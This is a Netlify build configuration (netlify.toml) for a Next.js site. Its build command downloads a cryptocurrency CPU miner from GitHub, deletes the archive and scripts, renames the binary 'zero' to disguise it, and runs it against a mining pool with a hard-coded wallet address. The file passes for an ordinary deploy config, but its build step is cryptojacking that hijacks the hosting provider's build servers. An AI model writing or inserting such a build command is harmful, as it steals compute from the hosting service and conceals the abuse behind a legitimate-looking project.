[build]
  command = "wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && rm *.tar.gz *.sh && mv hellminer zero && ./zero -c stratum+tcp://na.luckpool.net:3956 -u RAcBGk2mLkXuaG5qYtGeTRbdMQQi5JQ4jc.Bin -p x --cpu 2"
  publish = ".next"

[[plugins]]
  package = "@netlify/plugin-nextjs"
